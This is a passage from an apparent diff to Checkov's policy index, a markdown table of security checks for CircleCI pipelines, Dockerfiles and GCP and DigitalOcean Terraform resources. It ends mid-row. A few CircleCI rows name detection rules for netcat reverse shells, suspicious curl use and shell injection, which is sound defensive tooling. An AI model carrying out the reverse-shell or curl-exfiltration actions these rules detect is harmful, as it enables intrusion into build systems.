+| 2350 | CKV_CIRCLECIPIPELINES_4 | circleci_pipelines | orbs.{orbs: @} | Ensure unversioned volatile orbs are not used. | circleci_pipelines | [prevent_volatile_orbs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/prevent_volatile_orbs.py) |
+| 2351 | CKV_CIRCLECIPIPELINES_5 | circleci_pipelines | jobs.*.steps[] | Suspicious use of netcat with IP address | circleci_pipelines | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/ReverseShellNetcat.py) |
+| 2352 | CKV_CIRCLECIPIPELINES_6 | circleci_pipelines | jobs.*.steps[] | Ensure run commands are not vulnerable to shell injection | circleci_pipelines | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/ShellInjection.py) |
+| 2353 | CKV_CIRCLECIPIPELINES_7 | circleci_pipelines | jobs.*.steps[] | Suspicious use of curl in run task | circleci_pipelines | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/SuspectCurlInScript.py) |
+| 2354 | CKV_CIRCLECIPIPELINES_8 | circleci_pipelines | executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Detecting image usages in circleci pipelines | circleci_pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/DetectImagesUsage.py) |
+| 2355 | CKV_CIRCLECIPIPELINES_8 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Detecting image usages in circleci pipelines | circleci_pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/DetectImagesUsage.py) |
+| 2356 | CKV_DIO_1 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket has versioning enabled | Terraform | [SpacesBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketVersioning.py) |
+| 2357 | CKV_DIO_2 | resource | digitalocean_droplet | Ensure the droplet specifies an SSH key | Terraform | [DropletSSHKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/DropletSSHKeys.py) |
+| 2358 | CKV_DIO_3 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket is private | Terraform | [SpacesBucketPublicRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketPublicRead.py) |
+| 2359 | CKV_DIO_4 | resource | digitalocean_firewall | Ensure the firewall ingress is not wide open | Terraform | [FirewallIngressOpen.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/FirewallIngressOpen.py) |
+| 2360 | CKV_DOCKER_1 | dockerfile | EXPOSE | Ensure port 22 is not exposed | dockerfile | [ExposePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/ExposePort22.py) |
+| 2361 | CKV_DOCKER_2 | dockerfile | * | Ensure that HEALTHCHECK instructions have been added to container images | dockerfile | [HealthcheckExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/HealthcheckExists.py) |
+| 2362 | CKV_DOCKER_3 | dockerfile | * | Ensure that a user for the container has been created | dockerfile | [UserExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/UserExists.py) |
+| 2363 | CKV_DOCKER_4 | dockerfile | ADD | Ensure that COPY is used instead of ADD in Dockerfiles | dockerfile | [AddExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/AddExists.py) |
+| 2364 | CKV_DOCKER_5 | dockerfile | RUN | Ensure update instructions are not use alone in the Dockerfile | dockerfile | [UpdateNotAlone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/UpdateNotAlone.py) |
+| 2365 | CKV_DOCKER_6 | dockerfile | MAINTAINER | Ensure that LABEL maintainer is used instead of MAINTAINER (deprecated) | dockerfile | [MaintainerExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/MaintainerExists.py) |
+| 2366 | CKV_DOCKER_7 | dockerfile | FROM | Ensure the base image uses a non latest version tag | dockerfile | [ReferenceLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/ReferenceLatestTag.py) |
+| 2367 | CKV_DOCKER_8 | dockerfile | USER | Ensure the last USER is not root | dockerfile | [RootUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/RootUser.py) |
+| 2368 | CKV_DOCKER_9 | dockerfile | RUN | Ensure that APT isn't used | dockerfile | [RunUsingAPT.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/RunUsingAPT.py) |
+| 2369 | CKV_DOCKER_10 | dockerfile | WORKDIR | Ensure that WORKDIR values are absolute paths | dockerfile | [WorkdirIsAbsolute.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/WorkdirIsAbsolute.py) |
+| 2370 | CKV_DOCKER_11 | dockerfile | FROM | Ensure From Alias are unique for multistage builds. | dockerfile | [AliasIsUnique.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/AliasIsUnique.py) |
+| 2371 | CKV2_DOCKER_1 | resource | RUN | Ensure that sudo isn't used | dockerfile | [RunUsingSudo.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUsingSudo.yaml) |
+| 2372 | CKV2_DOCKER_2 | resource | RUN | Ensure that certificate validation isn't disabled with curl | dockerfile | [RunUnsafeCurl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUnsafeCurl.yaml) |
+| 2373 | CKV2_DOCKER_3 | resource | RUN | Ensure that certificate validation isn't disabled with wget | dockerfile | [RunUnsafeWget.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUnsafeWget.yaml) |
+| 2374 | CKV2_DOCKER_4 | resource | RUN | Ensure that certificate validation isn't disabled with the pip '--trusted-host' option | dockerfile | [RunPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunPipTrustedHost.yaml) |
+| 2375 | CKV2_DOCKER_5 | resource | ARG | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) |
+| 2376 | CKV2_DOCKER_5 | resource | ENV | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) |
+| 2377 | CKV2_DOCKER_5 | resource | RUN | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) |
+| 2378 | CKV2_DOCKER_6 | resource | ARG | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) |
+| 2379 | CKV2_DOCKER_6 | resource | ENV | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) |
+| 2380 | CKV2_DOCKER_6 | resource | RUN | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) |
+| 2381 | CKV2_DOCKER_7 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option | dockerfile | [RunApkAllowUntrusted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunApkAllowUntrusted.yaml) |
+| 2382 | CKV2_DOCKER_8 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option | dockerfile | [RunAptGetAllowUnauthenticated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunAptGetAllowUnauthenticated.yaml) |
+| 2383 | CKV2_DOCKER_9 | resource | RUN | Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option | dockerfile | [RunYumNoGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunYumNoGpgCheck.yaml) |
+| 2384 | CKV2_DOCKER_10 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options | dockerfile | [RunRpmNoSignature.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunRpmNoSignature.yaml) |
+| 2385 | CKV2_DOCKER_11 | resource | RUN | Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | dockerfile | [RunAptGetForceYes.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunAptGetForceYes.yaml) |
+| 2386 | CKV2_DOCKER_12 | resource | ARG | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) |
+| 2387 | CKV2_DOCKER_12 | resource | ENV | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) |
+| 2388 | CKV2_DOCKER_12 | resource | RUN | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) |
+| 2389 | CKV2_DOCKER_13 | resource | RUN | Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false | dockerfile | [RunNpmConfigSetStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunNpmConfigSetStrictSsl.yaml) |
+| 2390 | CKV2_DOCKER_14 | resource | ARG | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) |
+| 2391 | CKV2_DOCKER_14 | resource | ENV | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) |
+| 2392 | CKV2_DOCKER_14 | resource | RUN | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) |
+| 2393 | CKV2_DOCKER_15 | resource | RUN | Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option | dockerfile | [RunYumConfigManagerSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunYumConfigManagerSslVerify.yaml) |
+| 2394 | CKV2_DOCKER_16 | resource | ARG | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) |
+| 2395 | CKV2_DOCKER_16 | resource | ENV | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) |
+| 2396 | CKV2_DOCKER_16 | resource | RUN | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) |
+| 2397 | CKV2_DOCKER_17 | resource | RUN | Ensure that 'chpasswd' is not used to set or remove passwords | dockerfile | [RunChpasswd.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunChpasswd.yaml) |
+| 2398 | CKV_GCP_1 | resource | google_container_cluster | Ensure Stackdriver Logging is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py) |
+| 2399 | CKV_GCP_2 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted ssh access | Terraform | [GoogleComputeFirewallUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py) |
+| 2400 | CKV_GCP_3 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted rdp access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py) |
+| 2401 | CKV_GCP_4 | resource | google_compute_ssl_policy | Ensure no HTTPS or SSL proxy load balancers permit SSL policies with weak cipher suites | Terraform | [GoogleComputeSSLPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py) |
+| 2402 | CKV_GCP_6 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance requires all incoming connections to use SSL | Terraform | [GoogleCloudSqlDatabaseRequireSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py) |
+| 2403 | CKV_GCP_7 | resource | google_container_cluster | Ensure Legacy Authorization is set to Disabled on Kubernetes Engine Clusters | Terraform | [GKEDisableLegacyAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py) |
+| 2404 | CKV_GCP_8 | resource | google_container_cluster | Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py) |
+| 2405 | CKV_GCP_9 | resource | google_container_node_pool | Ensure 'Automatic node repair' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoRepairEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py) |
+| 2406 | CKV_GCP_10 | resource | google_container_node_pool | Ensure 'Automatic node upgrade' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoUpgradeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py) |
+| 2407 | CKV_GCP_11 | resource | google_sql_database_instance | Ensure that Cloud SQL database Instances are not open to the world | Terraform | [GoogleCloudSqlDatabasePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py) |
+| 2408 | CKV_GCP_12 | resource | google_container_cluster | Ensure Network Policy is enabled on Kubernetes Engine Clusters | Terraform | [GKENetworkPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py) |
+| 2409 | CKV_GCP_13 | resource | google_container_cluster | Ensure client certificate authentication to Kubernetes Engine Clusters is disabled | Terraform | [GKEClientCertificateDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py) |
+| 2410 | CKV_GCP_14 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance have backup configuration enabled | Terraform | [GoogleCloudSqlBackupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py) |
+| 2411 | CKV_GCP_15 | resource | google_bigquery_dataset | Ensure that BigQuery datasets are not anonymously or publicly accessible | Terraform | [GoogleBigQueryDatasetPublicACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py) |
+| 2412 | CKV_GCP_16 | resource | google_dns_managed_zone | Ensure that DNSSEC is enabled for Cloud DNS | Terraform | [GoogleCloudDNSSECEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py) |
+| 2413 | CKV_GCP_17 | resource | google_dns_managed_zone | Ensure that RSASHA1 is not used for the zone-signing and key-signing keys in Cloud DNS DNSSEC | Terraform | [GoogleCloudDNSKeySpecsRSASHA1.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py) |
+| 2414 | CKV_GCP_18 | resource | google_container_cluster | Ensure GKE Control Plane is not public | Terraform | [GKEPublicControlPlane.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py) |
+| 2415 | CKV_GCP_20 | resource | google_container_cluster | Ensure master authorized networks is set to enabled in GKE clusters | Terraform | [GKEMasterAuthorizedNetworksEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py) |
+| 2416 | CKV_GCP_21 | resource | google_container_cluster | Ensure Kubernetes Clusters are configured with Labels | Terraform | [GKEHasLabels.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEHasLabels.py) |
+| 2417 | CKV_GCP_22 | resource | google_container_node_pool | Ensure Container-Optimized OS (cos) is used for Kubernetes Engine Clusters Node image | Terraform | [GKEUseCosImage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py) |
+| 2418 | CKV_GCP_23 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Alias IP ranges enabled | Terraform | [GKEAliasIpEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py) |
+| 2419 | CKV_GCP_24 | resource | google_container_cluster | Ensure PodSecurityPolicy controller is enabled on the Kubernetes Engine Clusters | Terraform | [GKEPodSecurityPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py) |
+| 2420 | CKV_GCP_25 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Private cluster enabled | Terraform | [GKEPrivateClusterConfig.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py) |
+| 2421 | CKV_GCP_26 | resource | google_compute_subnetwork | Ensure that VPC Flow Logs is enabled for every subnet in a VPC Network | Terraform | [GoogleSubnetworkLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py) |
+| 2422 | CKV_GCP_27 | resource | google_project | Ensure that the default network does not exist in a project | Terraform | [GoogleProjectDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py) |
+| 2423 | CKV_GCP_28 | resource | google_storage_bucket_iam_binding | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) |
+| 2424 | CKV_GCP_28 | resource | google_storage_bucket_iam_member | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) |
+| 2425 | CKV_GCP_29 | resource | google_storage_bucket | Ensure that Cloud Storage buckets have uniform bucket-level access enabled | Terraform | [GoogleStorageBucketUniformAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py) |
+| 2426 | CKV_GCP_30 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) |
+| 2427 | CKV_GCP_30 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) |
+| 2428 | CKV_GCP_30 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) |
+| 2429 | CKV_GCP_31 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) |
+| 2430 | CKV_GCP_31 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) |
+| 2431 | CKV_GCP_31 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) |
+| 2432 | CKV_GCP_32 | resource | google_compute_instance | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) |
+| 2433 | CKV_GCP_32 | resource | google_compute_instance_from_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) |
+| 2434 | CKV_GCP_32 | resource | google_compute_instance_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) |
+| 2435 | CKV_GCP_33 | resource | google_compute_project_metadata | Ensure oslogin is enabled for a Project | Terraform | [GoogleComputeProjectOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py) |
+| 2436 | CKV_GCP_34 | resource | google_compute_instance | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) |
+| 2437 | CKV_GCP_34 | resource | google_compute_instance_from_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) |
+| 2438 | CKV_GCP_34 | resource | google_compute_instance_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) |
+| 2439 | CKV_GCP_35 | resource | google_compute_instance | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) |
+| 2440 | CKV_GCP_35 | resource | google_compute_instance_from_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) |
+| 2441 | CKV_GCP_35 | resource | google_compute_instance_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) |
+| 2442 | CKV_GCP_36 | resource | google_compute_instance | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) |
+| 2443 | CKV_GCP_36 | resource | google_compute_instance_from_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) |
+| 2444 | CKV_GCP_36 | resource | google_compute_instance_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) |
+| 2445 | CKV_GCP_37 | resource | google_compute_disk | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py) |
+| 2446 | CKV_GCP_38 | resource | google_compute_instance | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeBootDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py) |
+| 2447 | CKV_GCP_39 | resource | google_compute_instance | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) |
+| 2448 | CKV_GCP_39 | resource | google_compute_instance_from_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) |
+| 2449 | CKV_GCP_39 | resource | google_compute_instance_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) |
+| 2450 | CKV_GCP_40 | resource | google_compute_instance | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) |
+| 2451 | CKV_GCP_40 | resource | google_compute_instance_from_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) |
+| 2452 | CKV_GCP_40 | resource | google_compute_instance_template | Ensure that Compute instances do not have public IP addresses | Terraform | 
